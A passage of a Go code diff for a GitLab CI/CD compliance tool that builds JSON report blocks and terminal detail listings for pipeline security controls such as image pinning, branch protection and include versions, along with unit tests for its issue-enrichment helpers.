+ o := _originByIncludeSource(result.PipelineOriginData, src)
+ if o == nil {
+ continue
+ }
+ latest := ""
+ plumberPath := ""
+ if o.FromPlumber {
+ latest = o.PlumberOrigin.LatestVersion
+ plumberPath = o.PlumberOrigin.Path
+ } else if o.FromGitlabCatalog {
+ latest = o.GitlabComponent.ComponentLatestVersion
+ }
+ templateName := plumberPath
+ if templateName != "" && strings.Contains(templateName, "/") {
+ templateName = templateName[strings.LastIndex(templateName, "/")+1:]
+ }
+ componentName := o.GitlabComponent.ComponentName
+ if o.GitlabIncludeOrigin.Type == "component" && componentName == "" && o.GitlabIncludeOrigin.Location != "" {
+ loc := o.GitlabIncludeOrigin.Location
+ if strings.Contains(loc, "/") {
+ componentName = loc[strings.LastIndex(loc, "/")+1:]
+ }
+ }
+ issue["version"] = o.Version
+ if latest != "" {
+ issue["latestVersion"] = latest
+ }
+ if plumberPath != "" {
+ issue["plumberOriginPath"] = plumberPath
+ }
+ includeLoc := o.GitlabIncludeOrigin.Location
+ if includeLoc == "" {
+ includeLoc = o.GitlabComponent.ComponentIncludePath
+ }
+ if includeLoc != "" {
+ issue["gitlabIncludeLocation"] = includeLoc
+ }
+ if t := o.GitlabIncludeOrigin.Type; t != "" {
+ issue["gitlabIncludeType"] = t
+ }
+ if pr := o.GitlabIncludeOrigin.Project; pr != "" {
+ issue["gitlabIncludeProject"] = pr
+ }
+ issue["nested"] = o.Nested
+ if componentName != "" {
+ issue["componentName"] = componentName
+ }
+ if templateName != "" {
+ issue["plumberTemplateName"] = templateName
+ }
+ issue["originHash"] = o.OriginHash
+ }
+}
+
+func buildImageForbiddenTagsBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
+ total := 0
+ notPinned := 0
+ usingForbidden := 0
+ if result.PipelineImageData != nil {
+ total = len(result.PipelineImageData.Images)
+ for _, img := range result.PipelineImageData.Images {
+ if !utils.HasDigestPin(img.Link) {
+ notPinned++
+ }
+ }
+ }
+ for _, f := range findings {
+ if f.Code == string(control.CodeImageForbiddenTag) {
+ usingForbidden++
+ }
+ }
+ mustBePinned := false
+ if pc.Controls.ContainerImageMustNotUseForbiddenTags != nil {
+ mustBePinned = pc.Controls.ContainerImageMustNotUseForbiddenTags.IsPinnedByDigestRequired()
+ }
+ // Sort findings deterministically by job so consumer snapshots
+ // stay stable across runs. Stable's order came out of Go map
+ // iteration and is not reproducible itself; alphabetic-by-job
+ // gives at least a single canonical ordering on the dev side.
+ return map[string]any{
+ "issues": projectFindings(_sortedFindings(findings), "job"),
+ "metrics": map[string]any{
+ "total": total,
+ "usingForbiddenTags": usingForbidden,
+ "notPinnedByDigest": notPinned,
+ "pinnedByDigest": total - notPinned,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.4.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ "mustBePinnedByDigest": mustBePinned,
+ }
+}
+
+func buildImageAuthorizedSourcesBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := 0
+ if result.PipelineImageMetrics != nil {
+ total = int(result.PipelineImageMetrics.Total)
+ }
+ unauthorized := len(findings)
+ authorized := total - unauthorized
+ if authorized < 0 {
+ authorized = 0
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "total": total,
+ "authorized": authorized,
+ "unauthorized": unauthorized,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildBranchProtectionBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
+ total, toProtect, protected, unprotected := _branchProtectionCounts(result, pc)
+ nonCompliant := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeBranchNonCompliant) {
+ nonCompliant++
+ }
+ }
+ data := []map[string]any{}
+ if result.ProtectionData != nil && pc.Controls.BranchMustBeProtected != nil {
+ cfg := pc.Controls.BranchMustBeProtected
+ policyPatterns := cfg.NamePatterns
+ defaultProtected := cfg.DefaultMustBeProtected != nil && *cfg.DefaultMustBeProtected
+ // Mirror v0.2.x: only branches that fall under the project's
+ // protection policy land in `data` β non-policy branches are
+ // noise for compliance consumers and bloat the JSON. For each
+ // kept branch we surface the full protection settings vs the
+ // authorized thresholds, so consumers see at a glance which
+ // dimension breaks the contract.
+ authMerge := 0
+ if cfg.MinMergeAccessLevel != nil {
+ authMerge = *cfg.MinMergeAccessLevel
+ }
+ authPush := 0
+ if cfg.MinPushAccessLevel != nil {
+ authPush = *cfg.MinPushAccessLevel
+ }
+ // Index protections by the matched branch so we can read the
+ // concrete settings (force-push, access levels) per branch.
+ protectionByBranch := map[string]int{}
+ for i := range result.ProtectionData.BranchProtections {
+ pattern := result.ProtectionData.BranchProtections[i].ProtectionPattern
+ for _, name := range result.ProtectionData.Branches {
+ if _, seen := protectionByBranch[name]; seen {
+ continue
+ }
+ if _matchesAnyGlob(name, []string{pattern}) {
+ protectionByBranch[name] = i
+ }
+ }
+ }
+ // v0.2.x exposes the full protection settings (allowForcePush,
+ // access levels, authorized thresholds) only on branches that
+ // fired a non-compliance finding β compliant branches keep
+ // the slim {branchName, default, protected} shape so the JSON
+ // stays focused on what reviewers need to act on.
+ nonCompliantBranches := map[string]bool{}
+ for _, f := range findings {
+ if f.Code == string(control.CodeBranchNonCompliant) {
+ nonCompliantBranches[f.Job] = true
+ }
+ }
+ // Iterate the branches with the default branch first, then the
+ // rest sorted alphabetically β matches v0.2.x's display order
+ // where the project's flagship branch leads the data list.
+ ordered := make([]string, 0, len(result.ProtectionData.Branches))
+ if result.DefaultBranch != "" {
+ for _, b := range result.ProtectionData.Branches {
+ if b == result.DefaultBranch {
+ ordered = append(ordered, b)
+ break
+ }
+ }
+ }
+ others := make([]string, 0, len(result.ProtectionData.Branches))
+ for _, b := range result.ProtectionData.Branches {
+ if b != result.DefaultBranch {
+ others = append(others, b)
+ }
+ }
+ sort.Strings(others)
+ ordered = append(ordered, others...)
+ for _, name := range ordered {
+ matchesPolicy := _matchesAnyGlob(name, policyPatterns)
+ if !matchesPolicy && defaultProtected && name == result.DefaultBranch {
+ matchesPolicy = true
+ }
+ if !matchesPolicy {
+ continue
+ }
+ entry := map[string]any{
+ "branchName": name,
+ "default": name == result.DefaultBranch,
+ "protected": false,
+ }
+ if idx, ok := protectionByBranch[name]; ok {
+ p := &result.ProtectionData.BranchProtections[idx]
+ entry["protected"] = true
+ if nonCompliantBranches[name] {
+ entry["allowForcePush"] = p.AllowForcePush
+ entry["minMergeAccessLevel"] = _minAccessLevelGitlab(p.MergeAccessLevels)
+ entry["minPushAccessLevel"] = _minAccessLevelGitlab(p.PushAccessLevels)
+ entry["authorizedMinMergeAccessLevel"] = authMerge
+ entry["authorizedMinPushAccessLevel"] = authPush
+ }
+ }
+ data = append(data, entry)
+ }
+ }
+ // branchProtection projects findings as `issues` with the branch
+ // fields the legacy format documented (type, branchName, force-
+ // push toggles, access levels). The ISSUE-501/505 rules emit
+ // these directly so we just strip Rego-only fields. v0.2.19
+ // omits the `issues` key entirely when the list is empty rather
+ // than emitting `"issues": []`; reproduce that quirk so byte-for-
+ // byte JSON consumers (snapshot tests, etc.) stay aligned.
+ block := map[string]any{
+ "enabled": !c.Skipped,
+ "compliance": c.Compliance,
+ "version": "0.2.0",
+ "data": data,
+ "metrics": map[string]any{
+ "branches": total,
+ "branchesToProtect": toProtect,
+ "unprotectedBranches": unprotected,
+ "nonCompliantBranches": nonCompliant,
+ "totalProtectedBranches": protected,
+ "projectsCorrectlyProtected": protected - nonCompliant,
+ },
+ }
+ if len(findings) > 0 {
+ issues := projectFindings(findings, "")
+ enrichBranchProtection505IssueMaps(issues, result, pc)
+ block["issues"] = issues
+ }
+ return block
+}
+
+func buildHardcodedJobsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := uint(0)
+ hardcoded := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ total = result.PipelineOriginMetrics.JobTotal
+ hardcoded = result.PipelineOriginMetrics.JobHardcoded
+ }
+ return map[string]any{
+ "issues": projectFindings(_sortedFindings(findings), "jobName"),
+ "metrics": map[string]any{
+ "total": total,
+ "hardcodedJobs": hardcoded,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildOutdatedIncludesBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := _externalIncludeCount(result)
+ outdated := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ outdated = result.PipelineOriginMetrics.OriginOutdated
+ }
+ // Outdated-include issues drop the `job` field; the legacy shape
+ // already carries the include path under `gitlabIncludeLocation`.
+ // Sort by include location so the JSON stays deterministic across
+ // runs (Rego's set iteration order does not).
+ issues := projectFindings(_sortedFindings(findings), "")
+ sort.SliceStable(issues, func(i, j int) bool {
+ a, _ := issues[i]["gitlabIncludeLocation"].(string)
+ b, _ := issues[j]["gitlabIncludeLocation"].(string)
+ return a < b
+ })
+ // originHash is uint64. The Rego pipeline marshals it as a JSON
+ // number, OPA loads it as float64 (losing precision past 2^53),
+ // then emits it back the same way. Re-inject the precise integer
+ // from the IR by matching on the include location.
+ hashByLocation := map[string]uint64{}
+ if result.PipelineOriginData != nil {
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc != "" && o.OriginHash != 0 {
+ hashByLocation[loc] = o.OriginHash
+ }
+ }
+ }
+ for _, iss := range issues {
+ if loc, ok := iss["gitlabIncludeLocation"].(string); ok {
+ if h, ok := hashByLocation[loc]; ok {
+ iss["originHash"] = h
+ }
+ }
+ }
+ return map[string]any{
+ "issues": issues,
+ "metrics": map[string]any{
+ "total": total,
+ "originOutdated": outdated,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildForbiddenVersionsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := _externalIncludeCount(result)
+ usingForbidden := len(findings)
+ usingAuthorized := total - usingForbidden
+ if usingAuthorized < 0 {
+ usingAuthorized = 0
+ }
+ issues := projectFindings(findings, "job")
+ enrichForbiddenVersion404IssueMaps(issues, result)
+ return map[string]any{
+ "issues": issues,
+ "metrics": map[string]any{
+ "total": total,
+ "usingForbiddenVersion": usingForbidden,
+ "usingAuthorizedVersion": usingAuthorized,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildRequirementGroupsBlock(c legacyCommon, cfg *configuration.RequiredComponentsControlConfig, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ var groups [][]string
+ if cfg != nil && !c.Skipped {
+ groups = cfg.RequiredGroups
+ }
+ requirementGroups, satisfied := _resolveRequirementGroups(groups, result)
+ return map[string]any{
+ "requirementGroups": requirementGroups,
+ "issues": projectFindings(findings, "job"),
+ "overriddenIssues": []any{},
+ "metrics": map[string]any{
+ "totalGroups": len(requirementGroups),
+ "satisfiedGroups": satisfied,
+ "anySatisfiedGroup": len(requirementGroups) > 0 && satisfied > 0,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.2.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildRequirementGroupsTemplateBlock(c legacyCommon, cfg *configuration.RequiredTemplatesControlConfig, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ var groups [][]string
+ if cfg != nil && !c.Skipped {
+ groups = cfg.RequiredGroups
+ }
+ requirementGroups, satisfied := _resolveRequirementGroups(groups, result)
+ return map[string]any{
+ "requirementGroups": requirementGroups,
+ "issues": projectFindings(findings, "job"),
+ "overriddenIssues": []any{},
+ "metrics": map[string]any{
+ "totalGroups": len(requirementGroups),
+ "satisfiedGroups": satisfied,
+ "anySatisfiedGroup": len(requirementGroups) > 0 && satisfied > 0,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.2.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+// _resolveRequirementGroups expands each AND-group into the legacy
+// {requiredOrigins, foundOrigins, missingOrigins, overriddenOrigins,
+// isFullySatisfied} shape by matching every requirement string
+// against the origins the GitLab collector tracked. A requirement is
+// satisfied when an origin's normalised path equals it; it is also
+// flagged "overridden" when CollectOverriddenJobs returned at least
+// one entry for that origin.
+func _resolveRequirementGroups(groups [][]string, result *control.AnalysisResult) ([]map[string]any, int) {
+ out := make([]map[string]any, 0, len(groups))
+ satisfied := 0
+ // Build a path β overridden lookup so a single pass over each
+ // requirement can answer both "is it present?" and "is it
+ // overridden?" without rescanning origins per check.
+ originIsOverridden := map[string]bool{}
+ knownPaths := map[string]bool{}
+ if result != nil && result.PipelineOriginData != nil {
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc == "" {
+ continue
+ }
+ cleaned := utils.CleanOriginPath(loc)
+ knownPaths[cleaned] = true
+ for _, ov := range o.Jobs {
+ if ov.IsOverridden {
+ originIsOverridden[cleaned] = true
+ break
+ }
+ }
+ }
+ }
+ for idx, required := range groups {
+ found := []string{}
+ missing := []string{}
+ overridden := []string{}
+ for _, want := range required {
+ if knownPaths[want] {
+ found = append(found, want)
+ if originIsOverridden[want] {
+ overridden = append(overridden, want)
+ }
+ continue
+ }
+ missing = append(missing, want)
+ }
+ isFull := len(missing) == 0
+ if isFull {
+ satisfied++
+ }
+ out = append(out, map[string]any{
+ "groupIndex": idx,
+ "requiredOrigins": required,
+ "foundOrigins": found,
+ "missingOrigins": missing,
+ "overriddenOrigins": overridden,
+ "isFullySatisfied": isFull,
+ })
+ }
+ return out, satisfied
+}
+
+func buildDebugTraceBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "totalVariablesChecked": _countAllVariableBindings(result),
+ "forbiddenFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildVariableInjectionBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "jobsChecked": jobs,
+ "totalScriptLinesChecked": _countScriptLines(result),
+ "unsafeExpansionsFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildSecurityJobsBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "securityJobsFound": _countSecurityJobs(result, pc),
+ "weakenedJobs": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildUnverifiedScriptsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "jobsChecked": jobs,
+ "totalScriptLinesChecked": _countScriptLines(result),
+ "unverifiedScriptsFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildJobVariablesOverrideBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "totalVariablesChecked": _countProjectAuthoredVariables(result),
+ "overriddenFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildDockerInDockerBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ insecure := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeDockerInDockerInsecure) {
+ insecure++
+ }
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "totalJobsChecked": jobs,
+ "dindServicesFound": _countDinDServices(result),
+ "insecureDaemonFound": insecure,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
diff --git a/cmd/legacy_json_enrich_test.go b/cmd/legacy_json_enrich_test.go
new file mode 100644
index 0000000..355e0f7
--- /dev/null
+++ b/cmd/legacy_json_enrich_test.go
@@ -0,0 +1,111 @@
+package cmd
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ "github.com/getplumber/plumber/gitlab"
+)
+
+func TestEnrichBranchProtection505IssueMaps_LegacyDisplays(t *testing.T) {
+ t.Parallel()
+ f := false
+ min40 := 40
+ pc := &configuration.PlumberConfig{
+ Controls: configuration.ControlsConfig{
+ BranchMustBeProtected: &configuration.BranchProtectionControlConfig{
+ AllowForcePush: &f,
+ CodeOwnerApprovalRequired: boolPtr(true),
+ MinMergeAccessLevel: &min40,
+ MinPushAccessLevel: &min40,
+ },
+ },
+ }
+ result := &control.AnalysisResult{
+ ProtectionData: &collector.GitlabProtectionAnalysisData{
+ BranchProtections: []gitlab.BranchProtection{
+ {
+ ProtectionPattern: "main",
+ AllowForcePush: true,
+ CodeOwnerApprovalRequired: false,
+ PushAccessLevels: []gitlab.BranchProtectionAccessLevel{{AccessLevel: 30}},
+ MergeAccessLevels: []gitlab.BranchProtectionAccessLevel{{AccessLevel: 30}},
+ },
+ },
+ },
+ }
+ issues := []map[string]any{{
+ "code": string(control.CodeBranchNonCompliant),
+ "docUrl": "x",
+ "branchName": "main",
+ "job": "main",
+ }}
+ enrichBranchProtection505IssueMaps(issues, result, pc)
+ iss := issues[0]
+ if iss["codeOwnerApprovalRequired"] != false {
+ t.Fatalf("codeOwnerApprovalRequired: got %v", iss["codeOwnerApprovalRequired"])
+ }
+ if iss["allowForcePushDisplay"] != true {
+ t.Fatalf("allowForcePushDisplay: got %v", iss["allowForcePushDisplay"])
+ }
+ if iss["codeOwnerApprovalRequiredDisplay"] != true {
+ t.Fatalf("codeOwnerApprovalRequiredDisplay: got %v", iss["codeOwnerApprovalRequiredDisplay"])
+ }
+ if iss["minMergeAccessLevelDisplay"] != true {
+ t.Fatalf("minMergeAccessLevelDisplay: got %v", iss["minMergeAccessLevelDisplay"])
+ }
+ if iss["minPushAccessLevelDisplay"] != true {
+ t.Fatalf("minPushAccessLevelDisplay: got %v", iss["minPushAccessLevelDisplay"])
+ }
+}
+
+func boolPtr(b bool) *bool { return &b }
+
+func TestEnrichForbiddenVersion404IssueMaps_OriginFields(t *testing.T) {
+ t.Parallel()
+ result := &control.AnalysisResult{
+ PipelineOriginData: &collector.GitlabPipelineOriginData{
+ Origins: []collector.GitlabPipelineOriginDataFull{
+ {
+ GitlabPipelineOriginDataGeneric: collector.GitlabPipelineOriginDataGeneric{
+ OriginType: "project",
+ GitlabIncludeOrigin: gitlab.IncludeOriginWithoutRef{
+ Location: "file@1.0.0",
+ Type: "file",
+ Project: "g/x",
+ },
+ OriginHash: 99,
+ },
+ GitlabPipelineOriginDataProjectSpecific: collector.GitlabPipelineOriginDataProjectSpecific{
+ Version: "1.0.0",
+ Nested: true,
+ },
+ },
+ },
+ },
+ }
+ issues := []map[string]any{{
+ "code": string(control.CodeIncludeForbiddenVersion),
+ "docUrl": "x",
+ "job": "file@1.0.0",
+ }}
+ enrichForbiddenVersion404IssueMaps(issues, result)
+ iss := issues[0]
+ if iss["version"] != "1.0.0" {
+ t.Fatalf("version: got %v", iss["version"])
+ }
+ if iss["gitlabIncludeLocation"] != "file@1.0.0" {
+ t.Fatalf("gitlabIncludeLocation: got %v", iss["gitlabIncludeLocation"])
+ }
+ if iss["gitlabIncludeType"] != "file" {
+ t.Fatalf("gitlabIncludeType: got %v", iss["gitlabIncludeType"])
+ }
+ if iss["nested"] != true {
+ t.Fatalf("nested: got %v", iss["nested"])
+ }
+ if iss["originHash"] != uint64(99) {
+ t.Fatalf("originHash: got %v", iss["originHash"])
+ }
+}
diff --git a/cmd/render_details.go b/cmd/render_details.go
new file mode 100644
index 0000000..d672eae
--- /dev/null
+++ b/cmd/render_details.go
@@ -0,0 +1,794 @@
+package cmd
+
+import (
+ "cmp"
+ "fmt"
+ "slices"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+)
+
+// statLine is a single labelled metric rendered above the findings
+// listing of a findingGroup. Values are free-form strings so each
+// converter can format numbers however it needs (plain int, percentβ¦).
+type statLine struct {
+ Label string
+ Value string
+}
+
+// detailedFinding is the unified shape used to render per-rule detail
+// listings, independent of the original source. Message is printed
+// verbatim; Location, when set, is rendered as a clickable file:line
+// path right after the message so editors and terminals that detect
+// source references (VS Code, IntelliJ, iTerm, ...) can jump straight
+// to the offending job.
+type detailedFinding struct {
+ Code control.ErrorCode
+ Message string
+ DocURL string
+ Location string
+ // DetailLines is optional (e.g. ISSUE-505: one headline, several sub-reasons).
+ DetailLines []string
+}
+
+// findingGroup collects everything needed to render one per-rule
+// section: its title, compliance, optional stats block, and the list
+// of findings.
+type findingGroup struct {
+ Title string
+ Compliance float64
+ Skipped bool
+ Stats []statLine
+ Findings []detailedFinding
+}
+
+// renderFindingGroups prints each group in the canonical Plumber
+// format used across providers: horizontal separator header with the
+// rule title and compliance (or "skipped"), the stat lines, and an
+// "Issues Found" listing with severity tag, code, message and doc URL.
+// Groups with no stats, no findings and not marked skipped are not
+// rendered (they would just be empty noise).
+func renderFindingGroups(groups []findingGroup) {
+ for _, g := range groups {
+ if !g.Skipped && len(g.Stats) == 0 && len(g.Findings) == 0 {
+ continue
+ }
+ printControlHeader(g.Title, g.Compliance, g.Skipped)
+ if g.Skipped {
+ fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n\n", colorDim, colorReset)
+ continue
+ }
+ for _, s := range g.Stats {
+ fmt.Printf(" %s: %s\n", s.Label, s.Value)
+ }
+ if len(g.Findings) > 0 {
+ fmt.Printf("\n %sIssues Found:%s\n", colorYellow, colorReset)
+ for _, f := range g.Findings {
+ tag := severityTag(f.Code)
+ fmt.Printf(" %s [%s] %s\n", tag, f.Code, f.Message)
+ for _, line := range f.DetailLines {
+ fmt.Printf(" ββ %s\n", line)
+ }
+ if f.Location != "" {
+ // The bare path is emitted last so VS Code, iTerm
+ // and similar tools detect it as a clickable
+ // file:line reference and jump straight to the job.
+ fmt.Printf(" %sβ³ at %s%s\n", colorDim, f.Location, colorReset)
+ }
+ if f.DocURL != "" {
+ fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, f.DocURL, colorReset)
+ }
+ }
+ }
+ fmt.Println()
+ }
+}
+
+// formatFindingLocation returns "file:line" when both fields are set,
+// "file" when only File is set, and "" otherwise. The Line suffix
+// lets editors and terminals that detect source references jump
+// straight to the offending job (Ctrl-click in VS Code, Cmd-click
+// in iTerm, β¦).
+func formatFindingLocation(f opaengine.Finding) string {
+ if f.File == "" {
+ return ""
+ }
+ if f.Line > 0 {
+ return fmt.Sprintf("%s:%d", f.File, f.Line)
+ }
+ return f.File
+}
+
+// detailLinesFromFinding unpacks ISSUE-505 structured reasons into CLI sub-lines.
+func detailLinesFromFinding(f opaengine.Finding) []string {
+ if f.Code != string(control.CodeBranchNonCompliant) || f.Data == nil {
+ return nil
+ }
+ raw, ok := f.Data["reasons"]
+ if !ok || raw == nil {
+ return nil
+ }
+ lines := reasonsArrayToStrings(raw)
+ if len(lines) == 0 {
+ return nil
+ }
+ return sortBranchProtectionDetailLines(lines)
+}
+
+func reasonsArrayToStrings(raw interface{}) []string {
+ switch v := raw.(type) {
+ case []string:
+ return v
+ case []interface{}:
+ out := make([]string, 0, len(v))
+ for _, x := range v {
+ if s, ok := x.(string); ok {
+ out = append(out, s)
+ }
+ }
+ return out
+ default:
+ return nil
+ }
+}
+
+// sortBranchProtectionDetailLines applies a stable product order (force push,
+// code owner, then other reasons lexicographically).
+func sortBranchProtectionDetailLines(lines []string) []string {
+ if len(lines) < 2 {
+ return lines
+ }
+ out := slices.Clone(lines)
+ slices.SortFunc(out, func(a, b string) int {
+ return cmp.Or(
+ cmp.Compare(branchProtectionDetailRank(a), branchProtectionDetailRank(b)),
+ cmp.Compare(a, b),
+ )
+ })
+ return out
+}
+
+func branchProtectionDetailRank(s string) int {
+ switch {
+ case strings.HasPrefix(s, "Force push"):
+ return 0
+ case strings.HasPrefix(s, "Code owner"):
+ return 1
+ case strings.HasPrefix(s, "Merge access level"):
+ return 2
+ case strings.HasPrefix(s, "Push access level"):
+ return 3
+ default:
+ return 50
+ }
+}
+
+// sortBranchProtectionFindingsForDisplay prints ISSUE-505 before ISSUE-501 so the
+// protected-but-misconfigured branch appears above plain unprotected branches.
+func sortBranchProtectionFindingsForDisplay(findings []opaengine.Finding) {
+ if len(findings) < 2 {
+ return
+ }
+ rank := func(code string) int {
+ switch code {
+ case "ISSUE-505":
+ return 0
+ case "ISSUE-501":
+ return 1
+ default:
+ return 10
+ }
+ }
+ slices.SortFunc(findings, func(a, b opaengine.Finding) int {
+ return cmp.Or(
+ cmp.Compare(rank(a.Code), rank(b.Code)),
+ cmp.Compare(a.Job, b.Job),
+ cmp.Compare(a.Message, b.Message),
+ )
+ })
+}
+
+// buildGitLabControlStats returns the legacy aggregated metrics that
+// the v0.2.x analyzer printed under each control header β the
+// "Total Images: 9 / Authorized: 9 / Unauthorized: 0" block. The
+// Rego engine emits findings only, so we recompute the totals here
+// from the IR data still attached to AnalysisResult, the user
+// configuration (for "checked-list" sizes), and the per-control
+// findings list (for denominators and code-specific counts such as
+// ISSUE-102 / ISSUE-505). Each control name matches the entry
+// registered by control.GitLabControls().
+func buildGitLabControlStats(controlName string, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) []statLine {
+ if result == nil {
+ return nil
+ }
+ findingsCount := len(findings)
+ jobTotal := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ jobTotal = result.PipelineOriginMetrics.JobTotal
+ }
+ switch controlName {
+ case "containerImageMustNotUseForbiddenTags":
+ // Two distinct user intents share this control: forbid mutable
+ // tags, OR require a digest pin. The pin-by-digest variant
+ // counts how many images carry an OCI digest reference (any
+ // algorithm β sha256, sha512, β¦).
+ total := 0
+ pinned := 0
+ if result.PipelineImageData != nil {
+ total = len(result.PipelineImageData.Images)
+ for _, img := range result.PipelineImageData.Images {
+ if utils.HasDigestPin(img.Link) {
+ pinned++
+ }
+ }
+ }
+ notPinned := total - pinned
+ if notPinned < 0 {
+ notPinned = 0
+ }
+ usingForbidden := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeImageForbiddenTag) {
+ usingForbidden++
+ }
+ }
+ lines := []statLine{
+ {"Total Images", fmt.Sprintf("%d", total)},
+ }
+ if pc != nil && pc.Controls.ContainerImageMustNotUseForbiddenTags.IsPinnedByDigestRequired() {
+ lines = append(lines,
+ statLine{"Pinned By Digest", fmt.Sprintf("%d", pinned)},
+ statLine{"Not Pinned By Digest", fmt.Sprintf("%d", notPinned)},
+ )
+ }
+ lines = append(lines, statLine{"Using Forbidden Tags", fmt.Sprintf("%d", usingForbidden)})
+ return lines
+ case "containerImageMustComeFromAuthorizedSources":
+ total := 0
+ if result.PipelineImageMetrics != nil {
+ total = int(result.PipelineImageMetrics.Total)
+ }
+ unauthorized := findingsCount
+ authorized := total - unauthorized
+ if authorized < 0 {
+ authorized = 0
+ }
+ return []statLine{
+ {"Total Images", fmt.Sprintf("%d", total)},
+ {"Authorized", fmt.Sprintf("%d", authorized)},
